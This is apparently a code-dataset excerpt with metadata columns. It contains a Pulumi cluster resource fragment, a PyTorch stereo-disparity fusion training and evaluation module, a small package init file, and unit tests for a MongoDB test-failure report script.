        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
        :param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        :param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        :param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        :param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _ClusterState.__new__(_ClusterState)
        __props__.__dict__["cluster_name"] = cluster_name
        __props__.__dict__["cluster_type"] = cluster_type
        __props__.__dict__["logical_region_id"] = logical_region_id
        __props__.__dict__["network_mode"] = network_mode
        __props__.__dict__["vpc_id"] = vpc_id
        return Cluster(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> pulumi.Output[str]:
        """
        The name of the cluster that you want to create.
        """
        return pulumi.get(self, "cluster_name")
    @property
    @pulumi.getter(name="clusterType")
    def cluster_type(self) -> pulumi.Output[int]:
        """
        The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        """
        return pulumi.get(self, "cluster_type")
    @property
    @pulumi.getter(name="logicalRegionId")
    def logical_region_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        """
        return pulumi.get(self, "logical_region_id")
    @property
    @pulumi.getter(name="networkMode")
    def network_mode(self) -> pulumi.Output[int]:
        """
        The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        """
        return pulumi.get(self, "network_mode")
    @property
    @pulumi.getter(name="vpcId")
    def vpc_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        return pulumi.get(self, "vpc_id")
| 42.253197
| 192
| 0.642152
| 2,088
| 16,521
| 4.850096
| 0.081897
| 0.074948
| 0.05668
| 0.041473
| 0.84803
| 0.826997
| 0.819295
| 0.798262
| 0.772094
| 0.766268
| 0
| 0.002452
| 0.259427
| 16,521
| 390
| 193
| 42.361538
| 0.825255
| 0.352461
| 0
| 0.663415
| 1
| 0
| 0.105106
| 0.002985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156098
| false
| 0.004878
| 0.02439
| 0
| 0.273171
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76e7d6aed3a82a3122e16adcdf3dce7e3d265697
| 12,234
|
py
|
Python
|
fuse_utils.py
|
weihaosky/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 11
|
2020-04-23T04:18:15.000Z
|
2021-11-15T10:52:47.000Z
|
fuse_utils.py
|
zhangtianjia/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 2
|
2020-08-26T10:47:04.000Z
|
2021-03-31T01:56:51.000Z
|
fuse_utils.py
|
zhangtianjia/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 2
|
2020-12-25T08:11:22.000Z
|
2021-08-06T04:27:15.000Z
|
import torch, torchvision
import torch.nn.functional as F
from PIL import Image
import numpy as np
import os, cv2
# Scale selector for the ground-truth disparity PNGs: '' means stored values
# are the raw disparity, 'x4' means stored values are disparity*4 (the x4
# scale is divided back out in the test routines below).
# Disp_type = '' # the ground-truth disparity format is disparity*1
Disp_type = 'x4' # the ground-truth disparity format is disparity*4
def train(model, optimizer, costs_input, img, disp, args, Test=False):
    """Run one fusion step: forward pass, masked smooth-L1 loss, and (unless
    ``Test`` is True) a backward pass plus optimizer update.

    Args:
        model: fusion network taking a list of cost volumes.
        optimizer: optimizer for ``model`` (used only when ``Test`` is False).
        costs_input: list of cost-volume tensors.
        img: input image tensor (used only for the debug dump).
        disp: ground-truth disparity; zero marks invalid pixels.
        args: namespace providing ``cuda`` and ``output_path``.
        Test: when True, only evaluate — no gradient step.

    Returns:
        float: the scalar smooth-L1 loss value.
    """
    if Test:
        model.eval()
    else:
        model.train()
        optimizer.zero_grad()
    # NOTE(review): when args.cuda is False the cost list stays empty,
    # matching the original behaviour — confirm CPU mode is ever used.
    costs = []
    if args.cuda:
        img, disp = img.cuda(), disp.cuda()
        costs = [cost.cuda() for cost in costs_input]
    prediction = model(costs).squeeze(1)
    valid = (disp != 0)  # only pixels with ground-truth disparity
    loss = F.smooth_l1_loss(prediction[valid], disp[valid], reduction='mean')
    if not Test:
        loss.backward()
        optimizer.step()
    # Debug dump of the first sample's input image and predicted disparity.
    cv2.imwrite(args.output_path + 'train/img.png',
                255*img[0].permute([1,2,0]).detach().cpu().numpy())
    cv2.imwrite(args.output_path + 'train/outdisp.png',
                prediction[0].detach().cpu().numpy())
    return loss.data.item()
def test(model, args, epoch):
    """Evaluate the model on every scene under ``args.testpath``.

    Loads left/right cost volumes from ``.bin`` memmaps, pads them to a
    multiple of 16, fuses them tile-by-tile (512px tiles with an 8px overlap
    trimmed from interior edges), and scores the prediction against the
    ground-truth disparity.

    Bug fixes versus the previous version:
    - ``pad_w`` was computed from ``h % 16`` instead of ``w % 16``;
    - ``h / 16`` produced a float under Python 3 and broke ``F.pad``;
    - the tile counts parsed as ``(d // SIZE + 1) if rem else 0``, so an
      image whose dimension was an exact multiple of SIZE got ZERO tiles
      and was never processed — replaced with a ceil-divide.

    Returns:
        numpy.ndarray: mean of [avgerr, rms, bad0.5, bad1, bad2] over scenes.
    """
    test_record = []
    for scene in os.listdir(args.testpath):
        left_path = args.testpath + scene + '/' + 'left.bin'
        right_path = args.testpath + scene + '/' + 'right.bin'
        img_path = args.testpath + scene + '/' + 'view1.png'
        disp_path = args.testpath + scene + '/' + 'disp1' + Disp_type + '.png'
        d = args.maxdisp
        img = Image.open(img_path)
        w, h = img.size
        img = np.array(img).transpose(2, 0, 1)
        disp = Image.open(disp_path)
        disp = np.expand_dims(np.array(disp), 0)
        left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
        right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
        costL = np.squeeze(np.array(left_mem))
        costR = np.squeeze(np.array(right_mem))
        costL[np.isnan(costL)] = 20
        costR[np.isnan(costR)] = 20
        costL = torch.from_numpy(costL).unsqueeze(0).cuda()
        costR = torch.from_numpy(costR).unsqueeze(0).cuda()
        # Pad right/bottom so both dimensions are multiples of 16.
        pad_h = (-h) % 16
        pad_w = (-w) % 16  # BUGFIX: was derived from h
        costL = F.pad(costL, (0, pad_w, 0, pad_h))
        costR = F.pad(costR, (0, pad_w, 0, pad_h))
        # For large images, process tile by tile with a small overlap.
        SIZE = 512
        Edge = 8
        # BUGFIX: ceil-divide; the old conditional gave 0 tiles for exact multiples.
        wseg = (w + SIZE - 1) // SIZE
        hseg = (h + SIZE - 1) // SIZE
        outdisp = torch.ones(1, h + pad_h, w + pad_w).float().cuda()
        with torch.no_grad():
            for i in range(hseg):
                for j in range(wseg):
                    # Expand each tile by Edge pixels, then trim the halo
                    # from the model output (no halo on the first row/column).
                    y1 = max(i*SIZE - Edge, 0)
                    y2 = (i+1)*SIZE + Edge
                    x1 = max(j*SIZE - Edge, 0)
                    x2 = (j+1)*SIZE + Edge
                    outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
                        model([costL[:, :, y1:y2, x1:x2], costR[:, :, y1:y2, x1:x2]]) \
                        [:, min(i,1)*Edge:min(i,1)*Edge+SIZE, min(j,1)*Edge:min(j,1)*Edge+SIZE]
        outdisp = outdisp[:, :h, :w]
        dispgt = torch.from_numpy(disp).float().cuda()
        if Disp_type == 'x4':  # the ground-truth is disparity*4
            dispgt /= 4.0
        mask = (dispgt != 0)
        diff = torch.abs(outdisp[mask] - dispgt[mask])
        avgerr = torch.mean(diff)
        rms = torch.sqrt((diff**2).mean())
        bad05 = len(diff[diff > 0.5]) / float(len(diff))
        bad1 = len(diff[diff > 1]) / float(len(diff))
        bad2 = len(diff[diff > 2]) / float(len(diff))
        test_record.append([avgerr, rms, bad05, bad1, bad2])
        cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
                    outdisp.cpu().numpy().squeeze())
    test_res = np.array(test_record).mean(0)
    print('==== epoch %d test avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ==='
          % (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]) )
    return test_res
def eval(model, args, epoch):
    """Run the model over every scene under ``args.evalpath`` and write the
    predicted disparity maps to ``args.output_path + 'eval/'``.

    Bug fixes versus the previous version:
    - ``hseg`` was computed from ``w`` instead of ``h``;
    - ``pad_w`` was computed from ``h % 16`` instead of ``w % 16`` and the
      Python-3 float division ``h / 16`` broke ``F.pad``;
    - exact multiples of SIZE produced 0 tiles (conditional precedence).

    Returns:
        list: always empty — kept for interface compatibility; no metrics
        are accumulated here (there is no ground truth for eval scenes).
    """
    eval_record = []
    for scene in os.listdir(args.evalpath):
        left_path = args.evalpath + scene + '/' + 'left.bin'
        right_path = args.evalpath + scene + '/' + 'right.bin'
        img_path = args.evalpath + scene + '/' + 'view1.png'
        d = args.maxdisp
        img = Image.open(img_path)
        w, h = img.size
        left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
        right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
        costL = np.squeeze(np.array(left_mem))
        costR = np.squeeze(np.array(right_mem))
        costL[np.isnan(costL)] = 20
        costR[np.isnan(costR)] = 20
        costL = torch.from_numpy(costL).unsqueeze(0).cuda()
        costR = torch.from_numpy(costR).unsqueeze(0).cuda()
        # Pad right/bottom so both dimensions are multiples of 16.
        pad_h = (-h) % 16
        pad_w = (-w) % 16  # BUGFIX: was derived from h
        costL = F.pad(costL, (0, pad_w, 0, pad_h))
        costR = F.pad(costR, (0, pad_w, 0, pad_h))
        # For large images, process tile by tile.
        SIZE = 512
        # BUGFIX: ceil-divide, and hseg based on h (was w).
        wseg = (w + SIZE - 1) // SIZE
        hseg = (h + SIZE - 1) // SIZE
        outdisp = torch.ones(1, h + pad_h, w + pad_w).float().cuda()
        with torch.no_grad():
            for i in range(hseg):
                for j in range(wseg):
                    outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
                        model([costL[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
                               costR[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE]])
        outdisp = outdisp[:, :h, :w]
        cv2.imwrite(args.output_path + 'eval/' + scene + "_outdisp.png",
                    outdisp.cpu().numpy().squeeze())
    return eval_record
def test4(model, args, epoch):
    """Evaluate a four-view fusion model (left/right/bottom/top cost volumes)
    on every scene under ``args.trainpath`` and report disparity metrics.

    The bottom/top volumes are stored transposed on disk and are rotated 90°
    clockwise to align with the left/right volumes before fusion.

    Bug fixes versus the previous version:
    - ``hseg`` was computed from ``w`` instead of ``h``;
    - exact multiples of SIZE produced 0 tiles (conditional precedence),
      so such images were never processed.

    Returns:
        numpy.ndarray: mean of [avgerr, rms, bad0.5, bad1, bad2] over scenes.
    """
    # ====================== train data ========================
    test_record = []
    for scene in os.listdir(args.trainpath):
        left_path = args.trainpath + scene + '/left.bin'
        right_path = args.trainpath + scene + '/right.bin'
        bottom_path = args.trainpath + scene + '/bottom.bin'
        top_path = args.trainpath + scene + '/top.bin'
        img_path = args.trainpath + scene + '/view1.png'
        disp_path = args.trainpath + scene + '/disp1' + Disp_type + '.png'
        d = args.maxdisp
        img = Image.open(img_path)
        w, h = img.size
        img = np.array(img).transpose(2, 0, 1)
        disp = Image.open(disp_path)
        disp = np.expand_dims(np.array(disp), 0)
        left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
        right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
        costL = np.squeeze(np.array(left_mem))
        costR = np.squeeze(np.array(right_mem))
        costL[np.isnan(costL)] = 20
        costR[np.isnan(costR)] = 20
        costL = torch.from_numpy(costL).unsqueeze(0).cuda()
        costR = torch.from_numpy(costR).unsqueeze(0).cuda()
        # Vertical-pair volumes are stored (1, d, w, h); rotate into (1, d, h, w).
        bottom = np.memmap(bottom_path, dtype=np.float32, shape=(1, d, w, h))
        top = np.memmap(top_path, dtype=np.float32, shape=(1, d, w, h))
        bottom = np.rot90(np.array(bottom), k=-1, axes=(2,3)).copy()
        top = np.rot90(np.array(top), k=-1, axes=(2,3)).copy()
        bottom[np.isnan(bottom)] = 20
        top[np.isnan(top)] = 20
        bottom = np.squeeze(bottom)
        top = np.squeeze(top)
        costB = torch.from_numpy(bottom).unsqueeze(0).cuda()
        costT = torch.from_numpy(top).unsqueeze(0).cuda()
        # For large images, process tile by tile.
        SIZE = 512
        # BUGFIX: ceil-divide, and hseg based on h (was w).
        wseg = (w + SIZE - 1) // SIZE
        hseg = (h + SIZE - 1) // SIZE
        outdisp = torch.ones(1, h, w).float().cuda()
        with torch.no_grad():
            for i in range(hseg):
                for j in range(wseg):
                    outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
                        model([costL[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
                               costR[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
                               costB[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
                               costT[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE]])
        outdisp = outdisp.squeeze(1)
        dispgt = torch.from_numpy(disp).float().cuda()
        if Disp_type == 'x4':  # the ground-truth is disparity*4
            dispgt /= 4.0
        mask = (dispgt != 0)
        diff = torch.abs(outdisp[mask] - dispgt[mask])
        avgerr = torch.mean(diff)
        rms = torch.sqrt((diff**2).mean())
        bad05 = len(diff[diff > 0.5]) / float(len(diff))
        bad1 = len(diff[diff > 1]) / float(len(diff))
        bad2 = len(diff[diff > 2]) / float(len(diff))
        test_record.append([avgerr, rms, bad05, bad1, bad2])
        cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
                    outdisp.cpu().numpy().squeeze())
    test_res = np.array(test_record).mean(0)
    print('======= epoch %d avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ======='
          % (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]))
    return test_res
def test1(model, args, epoch):
    """Evaluate `model` on every scene under ``args.testpath`` using only the
    right-view cost volume, and report disparity-error metrics.

    For each scene the pre-computed cost volume ``right.bin`` is memory-mapped,
    NaN costs are replaced with a large penalty, the volume is zero-padded so
    both sides are multiples of 16, and large images are processed in
    overlapping SIZE x SIZE tiles.  The prediction is compared against the
    ground-truth ``disp1<Disp_type>.png``.

    :param model: network taking ``[cost]`` (1 x d x H x W) and returning a
        disparity map indexable as (1 x H x W).  # assumes 3-D output -- TODO confirm
    :param args: namespace providing ``testpath``, ``maxdisp`` and ``output_path``.
    :param epoch: current epoch number; used only in the summary printout.
    :return: numpy array ``[avgerr, rms, bad05, bad1, bad2]`` averaged over all scenes.
    """
    test_record = []
    for scene in os.listdir(args.testpath):
        right_path = args.testpath + scene + '/' + 'right.bin'
        img_path = args.testpath + scene + '/' + 'view1.png'
        disp_path = args.testpath + scene + '/' + 'disp1' + Disp_type + '.png'
        d = args.maxdisp
        img = Image.open(img_path)
        w, h = img.size  # image is only opened to learn the scene dimensions
        disp = Image.open(disp_path)
        disp = np.expand_dims(np.array(disp), 0)
        right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
        costR = np.squeeze(np.array(right_mem))
        costR[np.isnan(costR)] = 20  # replace NaN costs with a large penalty
        costR = torch.from_numpy(costR).unsqueeze(0).cuda()
        # Pad H and W up to the next multiple of 16.
        # BUGFIX: use floor division (``h / 16`` yielded a float pad size under
        # Python 3, breaking F.pad) and measure the width remainder with ``w``,
        # not ``h``.
        pad_h = (h // 16 + (1 if h % 16 != 0 else 0)) * 16 - h
        pad_w = (w // 16 + (1 if w % 16 != 0 else 0)) * 16 - w
        costR = F.pad(costR, (0, pad_w, 0, pad_h))
        # For large images: process in SIZE x SIZE tiles with Edge-pixel overlap.
        SIZE = 512
        Edge = 8
        # BUGFIX: ``w // SIZE + 1 if cond else 0`` parsed as
        # ``(w // SIZE + 1) if cond else 0``, yielding ZERO tiles whenever a
        # side is an exact multiple of SIZE.  Ceil-division is what was meant.
        wseg = (w + SIZE - 1) // SIZE
        hseg = (h + SIZE - 1) // SIZE
        outdisp = torch.ones(1, h + pad_h, w + pad_w).float().cuda()
        with torch.no_grad():
            for i in range(hseg):
                for j in range(wseg):
                    # Crop with an extra Edge margin (clamped at the image
                    # border) so tile seams see context, then trim the margin
                    # back off the prediction before pasting it into outdisp.
                    y1 = max(i * SIZE - Edge, 0)
                    y2 = (i + 1) * SIZE + Edge
                    x1 = max(j * SIZE - Edge, 0)
                    x2 = (j + 1) * SIZE + Edge
                    outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
                        model([costR[:, :, y1:y2, x1:x2]]) \
                        [:, min(i, 1)*Edge:min(i, 1)*Edge+SIZE, min(j, 1)*Edge:min(j, 1)*Edge+SIZE]
        outdisp = outdisp[:, :h, :w]  # discard the multiple-of-16 padding
        dispgt = torch.from_numpy(disp).float().cuda()
        if Disp_type == 'x4':  # the ground-truth is disparity*4
            dispgt /= 4.0
        mask = (dispgt != 0)  # zero marks invalid ground-truth pixels
        diff = torch.abs(outdisp[mask] - dispgt[mask])
        avgerr = torch.mean(diff)
        rms = torch.sqrt((diff ** 2).mean())
        bad05 = len(diff[diff > 0.5]) / float(len(diff))
        bad1 = len(diff[diff > 1]) / float(len(diff))
        bad2 = len(diff[diff > 2]) / float(len(diff))
        # BUGFIX: store plain Python floats; np.array() below cannot convert
        # 0-dim CUDA tensors.
        test_record.append([avgerr.item(), rms.item(), bad05, bad1, bad2])
        cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
                    outdisp.cpu().numpy().squeeze())
    test_res = np.array(test_record).mean(0)
    print('==== epoch %d test avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ==='
          % (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]))
    return test_res
| 41.89726
| 102
| 0.5094
| 1,720
| 12,234
| 3.540698
| 0.087791
| 0.019704
| 0.013793
| 0.011494
| 0.824138
| 0.816749
| 0.783415
| 0.75468
| 0.749261
| 0.740394
| 0
| 0.044909
| 0.319274
| 12,234
| 292
| 103
| 41.89726
| 0.686359
| 0.031797
| 0
| 0.725738
| 0
| 0.012658
| 0.044967
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021097
| false
| 0
| 0.021097
| 0
| 0.063291
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76e9d48b4f1d3eb73d3ff45bbbd330d689102b30
| 203
|
py
|
Python
|
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
from fastforms.fields.core import *
from fastforms.fields.simple import *
# Compatibility imports
from fastforms.fields.core import Label, Field
from fastforms.utils import unset_value as _unset_value
| 25.375
| 55
| 0.827586
| 28
| 203
| 5.892857
| 0.5
| 0.315152
| 0.345455
| 0.278788
| 0.351515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118227
| 203
| 7
| 56
| 29
| 0.921788
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0a2c570897be23f99dde04220b01b3d053278f1d
| 27,915
|
py
|
Python
|
buildscripts/tests/test_test_failures.py
|
MartinNeupauer/mongo
|
6cc2dfe7edd312b8596355edef454e15988e350e
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:41:01.000Z
|
2019-10-10T06:41:01.000Z
|
buildscripts/tests/test_test_failures.py
|
visemet/mongo
|
232c772546f26bcb5a5556d859e56002a4135f0b
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:01:11.000Z
|
2021-03-26T00:02:19.000Z
|
buildscripts/tests/test_test_failures.py
|
visemet/mongo
|
232c772546f26bcb5a5556d859e56002a4135f0b
|
[
"Apache-2.0"
] | 5
|
2020-12-16T13:31:55.000Z
|
2021-01-17T07:39:30.000Z
|
"""
Tests for buildscripts/test_failures.py.
"""
from __future__ import absolute_import
import datetime
import unittest
from buildscripts import test_failures
class TestReportEntry(unittest.TestCase):
    """
    Tests for the test_failures.ReportEntry class.
    """

    # Template entry; each test derives its fixtures from it via namedtuple
    # _replace(), overriding only the fields relevant to that test.
    ENTRY = test_failures.ReportEntry(test="jstests/core/all.js",
                                      task="jsCore_WT",
                                      variant="linux-64",
                                      distro="rhel62",
                                      start_date=datetime.date(2017, 6, 3),
                                      end_date=datetime.date(2017, 6, 3),
                                      num_pass=0,
                                      num_fail=0)

    def test_fail_rate(self):
        """
        Tests for the test_failures.ReportEntry.fail_rate property.
        """
        entry = self.ENTRY._replace(num_pass=0, num_fail=1)
        self.assertEqual(1, entry.fail_rate)

        entry = self.ENTRY._replace(num_pass=9, num_fail=1)
        self.assertAlmostEqual(0.1, entry.fail_rate)

        # Verify that we don't attempt to divide by zero.
        entry = self.ENTRY._replace(num_pass=0, num_fail=0)
        self.assertEqual(0, entry.fail_rate)

    def test_week_start_date_with_sunday(self):
        """
        Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
        specified as different forms of the string "Sunday".
        """
        # 2017-06-03 is a Saturday, so the enclosing Sunday-based week starts 2017-05-28.
        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))
        self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("sunday"))
        self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("Sunday"))
        self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("SUNDAY"))

        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4))
        self.assertEqual(datetime.date(2017, 6, 4), entry.week_start_date("sunday"))

        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 5))
        self.assertEqual(datetime.date(2017, 6, 4), entry.week_start_date("sunday"))

    def test_week_start_date_with_monday(self):
        """
        Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
        specified as different forms of the string "Monday".
        """
        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))
        self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("monday"))
        self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("Monday"))
        self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("MONDAY"))

        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4))
        self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("monday"))

        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 5))
        self.assertEqual(datetime.date(2017, 6, 5), entry.week_start_date("monday"))

        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 6))
        self.assertEqual(datetime.date(2017, 6, 5), entry.week_start_date("monday"))

    def test_week_start_date_with_date(self):
        """
        Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
        specified as a datetime.date() value.
        """
        entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))

        # Each case first asserts the weekday of the reference date, then checks
        # that week_start_date() aligns the entry's start_date to that weekday.
        date = datetime.date(2017, 5, 21)
        self.assertEqual(6, date.weekday(), "2017 May 21 is a Sunday")
        self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date(date))

        date = datetime.date(2017, 5, 22)
        self.assertEqual(0, date.weekday(), "2017 May 22 is a Monday")
        self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date(date))

        date = datetime.date(2017, 6, 6)
        self.assertEqual(1, date.weekday(), "2017 Jun 06 is a Tuesday")
        self.assertEqual(datetime.date(2017, 5, 30), entry.week_start_date(date))

        date = datetime.date(2017, 6, 9)
        self.assertEqual(4, date.weekday(), "2017 Jun 09 is a Friday")
        self.assertEqual(datetime.date(2017, 6, 2), entry.week_start_date(date))

        date = datetime.date(2017, 6, 3)
        self.assertEqual(5, date.weekday(), "2017 Jun 03 is a Saturday")
        self.assertEqual(datetime.date(2017, 6, 3), entry.week_start_date(date))

    def test_sum_combines_test_results(self):
        """
        Tests for test_failures.ReportEntry.sum() that verify the start_date, end_date, num_pass,
        and num_fail attributes are accumulated correctly.
        """
        entry1 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 1),
                                     end_date=datetime.date(2017, 6, 1),
                                     num_pass=1,
                                     num_fail=0)

        entry2 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 2),
                                     end_date=datetime.date(2017, 6, 2),
                                     num_pass=0,
                                     num_fail=3)

        entry3 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3),
                                     end_date=datetime.date(2017, 6, 3),
                                     num_pass=0,
                                     num_fail=0)

        entry4 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4),
                                     end_date=datetime.date(2017, 6, 4),
                                     num_pass=2,
                                     num_fail=2)

        entry_1234 = test_failures.ReportEntry.sum([entry1, entry2, entry3, entry4])
        entry_1432 = test_failures.ReportEntry.sum([entry1, entry4, entry3, entry2])
        entry_124 = test_failures.ReportEntry.sum([entry1, entry2, entry4])
        entry_13 = test_failures.ReportEntry.sum([entry1, entry3])
        entry_42 = test_failures.ReportEntry.sum([entry4, entry2])

        # sum() spans the min start_date and max end_date, and totals counts.
        self.assertEqual(datetime.date(2017, 6, 1), entry_1234.start_date)
        self.assertEqual(datetime.date(2017, 6, 4), entry_1234.end_date)
        self.assertEqual(3, entry_1234.num_pass)
        self.assertEqual(5, entry_1234.num_fail)
        self.assertEqual(entry_1234, entry_1432, "order of arguments shouldn't matter")
        self.assertEqual(entry_1234, entry_124, "entry3 didn't have any test executions")

        self.assertEqual(datetime.date(2017, 6, 1), entry_13.start_date)
        self.assertEqual(datetime.date(2017, 6, 3), entry_13.end_date)
        self.assertEqual(1, entry_13.num_pass)
        self.assertEqual(0, entry_13.num_fail)

        self.assertEqual(datetime.date(2017, 6, 2), entry_42.start_date)
        self.assertEqual(datetime.date(2017, 6, 4), entry_42.end_date)
        self.assertEqual(2, entry_42.num_pass)
        self.assertEqual(5, entry_42.num_fail)

    def test_sum_combines_test_info(self):
        """
        Tests for test_failures.ReportEntry.sum() that verify the test, task, variant, and distro
        attributes are accumulated correctly.
        """
        entry1 = self.ENTRY._replace(test="jstests/core/all.js",
                                     task="jsCore_WT",
                                     variant="linux-64",
                                     distro="rhel62")

        entry2 = self.ENTRY._replace(test="jstests/core/all.js",
                                     task="jsCore_WT",
                                     variant="linux-64",
                                     distro="rhel55")

        entry3 = self.ENTRY._replace(test="jstests/core/all2.js",
                                     task="jsCore_WT",
                                     variant="linux-64-debug",
                                     distro="rhel62")

        entry4 = self.ENTRY._replace(test="jstests/core/all.js",
                                     task="jsCore",
                                     variant="linux-64-debug",
                                     distro="rhel62")

        # Attributes that differ across the summed entries collapse to a
        # Wildcard; attributes common to all entries are kept verbatim.
        entry_12 = test_failures.ReportEntry.sum([entry1, entry2])
        self.assertEqual("jstests/core/all.js", entry_12.test)
        self.assertEqual("jsCore_WT", entry_12.task)
        self.assertEqual("linux-64", entry_12.variant)
        self.assertIsInstance(entry_12.distro, test_failures.Wildcard)

        entry_123 = test_failures.ReportEntry.sum([entry1, entry2, entry3])
        self.assertIsInstance(entry_123.test, test_failures.Wildcard)
        self.assertEqual("jsCore_WT", entry_123.task)
        self.assertIsInstance(entry_123.variant, test_failures.Wildcard)
        self.assertIsInstance(entry_123.distro, test_failures.Wildcard)

        entry_1234 = test_failures.ReportEntry.sum([entry1, entry2, entry3, entry4])
        self.assertIsInstance(entry_1234.test, test_failures.Wildcard)
        self.assertIsInstance(entry_1234.task, test_failures.Wildcard)
        self.assertIsInstance(entry_1234.variant, test_failures.Wildcard)
        self.assertIsInstance(entry_1234.distro, test_failures.Wildcard)

        entry_34 = test_failures.ReportEntry.sum([entry3, entry4])
        self.assertIsInstance(entry_34.test, test_failures.Wildcard)
        self.assertIsInstance(entry_34.task, test_failures.Wildcard)
